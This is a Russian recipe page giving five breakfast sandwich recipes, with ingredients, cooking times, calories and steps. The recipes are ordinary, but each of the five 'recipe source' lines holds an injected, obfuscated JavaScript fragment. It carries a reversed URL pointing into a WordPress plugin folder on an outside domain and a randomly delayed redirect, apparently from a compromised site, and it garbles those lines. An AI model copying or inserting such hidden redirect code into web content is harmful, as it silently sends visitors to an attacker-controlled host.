Бутерброды — это не только хлеб с колбасой и сыром. Не верите? Даша Кондрашова делится с вами сразу пятью способами приготовить бутерброды. И никакой колбасы!
Чесночные тосты с яичницей и жареными помидорами
Сочетание томатов с оливковым маслом повышает всасывание ликопина, который может снизить риск сердечных заболеваний. Ну а добавив к ним тост с яйцом, вы приготовите не только полезный, но и очень вкусный завтрак.
Фото: marthastewart.com
Лучшие рецепты бутербродов на завтрак
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
15 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
4
КАЛОРИЙНОСТЬ:
162
162 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
ржаной цельнозерной хлеб
4 кусочка
чеснок
1 зубчик
оливковое масло
1 ст. л.
яйца
4 шт.
помидоры
4 шт.
крупная соль, свежемолотый перец
по вкусу
- Хлеб поджарьте на сухой сковороде или в тостере. Чеснок очистите и натрите им хлеб. Смажьте каждый ломтик оливковым маслом.
- Приготовьте яичницу-глазунью из четырёх яиц, приправьте солью и перцем. Переложите на тарелку.
- Помидоры разрежьте на половинки, выложите срезом вниз на горячую сковороду и жарьте на сильном огне 3—4 минуты.
- Готовые помидоры выложите на каждый тост и немного придавите вилкой. Посолите, поперчите, сверху положите по жареному яйцу.
Бутерброды из ржаного хлеба с копчёным лососем и огурцом
Сочетание нежирного крем-сыра и копчёного лосося — беспроигрышный вариант.
Фото: marthastewart.com
Лучшие рецепты бутербродов на завтрак
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
15 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
4
КАЛОРИЙНОСТЬ:
230
230 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
ржаной цельнозерновой хлеб
8 тонких кусочков
нежирный крем-сыр
8 ст. л.
огурец
1 шт.
копчёный лосось
120 г
красный лук
1/2 луковицы
каперсы
1 ч. л.
свежемолотый перец
по вкусу
лимон
1 шт.
- Разогрейте духовку до 160 градусов. Выложите хлеб на противень и поджарьте в духовке до золотистой корочки, примерно 10 минут.
- Огурец, лосось и лук нарежьте на тонкие ломтики.
- Каждый ломтик хлеба смажьте сыром. Выложите огурец, лосось, лук и каперсы. Приправьте перцем и сбрызните лимонным соком.
Бутерброд с омлетом и авокадо
Омлет и авокадо. Просто и вкусно.
Лучшие рецепты бутербродов на завтрак
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
15 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
1
КАЛОРИЙНОСТЬ:
390
390 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
авокадо
четвертинка
яйцо
1 шт.
яичный белок
1 шт.
оливковое масло
1 ч. л.
цельнозерновая булочка
1 шт.
луковица
1 маленькая
соль, перец
по вкусу
острый соус
по желанию
- Луковицу мелко нарежьте и обжаривайте в сковороде небольшого диаметра четыре минуты.
- Взбейте яйцо и белок. Вылейте яйца на сковороду и жарьте до готовности. Посолите и поперчите. Авокадо нарежьте тонкими ломтиками.
- Булочку разрежьте пополам. На нижнюю половину положите омлет и авокадо. Накройте бутерброд с омлетом верхней частью булочки и ешьте.
Багет с пармезаном и беконом
Используйте багет из цельнозерновой муки с отрубями — так блюдо получится полезнее.
Фото: marthastewart.com
Лучшие рецепты бутербродов на завтрак
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
50 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
6
КАЛОРИЙНОСТЬ:
256
256 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
цельнозерновой багет
1 шт. (40 см)
яйца
5 шт.
лимонная цедра
1 ч. л.
молоко
3 ст. л.
петрушка
50 г
натёртый пармезан
100 г
бекон
4 ломтика (60 г)
соль, перец
по вкусу
- Духовку разогрейте до 175 градусов.
- Надрежьте багет сверху по всей длине, извлеките мякоть. Отложите её в сторону.
- В миске взбейте яйца, добавьте лимонную цедру, нарезанную петрушку, молоко и пармезан. Приправьте солью и перцем по вкусу. Добавьте половину хлебной мякоти.
- Хлеб положите на противень. Внутрь багета поместите ломтики бекона, а затем аккуратно влейте яичную смесь. Выпекайте до готовности, примерно 30—35 минут.
- Нарежьте на шесть частей и подавайте.
Бутерброд с яйцом, томатом и базиликом
Суперсытный вариант.
Фото: marthastewart.com
Лучшие рецепты бутербродов на завтрак
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
10 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
1
КАЛОРИЙНОСТЬ:
600
600 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
цельнозерновой багет
15 см
сыр чеддер
2 ломтика
яйца
2 шт.
помидор
2 большие дольки
базилик
несколько листочков
соль, перец
по вкусу
- Разогрейте духовку до 175 градусов. Багет разрежьте горизонтально, положите на противень. Накройте сыром и готовьте в духовке до тех пор, пока сыр не расплавится.
- Приготовьте яичницу.
- На одну половинку багета положите готовые яйца. Посолите и поперчите по вкусу. Сверху выложите ломтики томата, листья базилика. Накройте второй половинкой багета. Готовый бутерброд заверните в пергамент. Готово!
5 ПАНИНИ, КОТОРЫЕ ЗАХОЧЕТСЯ СЪЕСТЬ ЗДЕСЬ И СЕЙЧАС
10 САМЫХ КРУТЫХ И ВКУСНЫХ ХЛЕБНЫХ ТОСТОВ
3 СЭНДВИЧА, КОТОРЫЕ НЕ ИСПОРТЯТ ВАШУ ФИГУРУ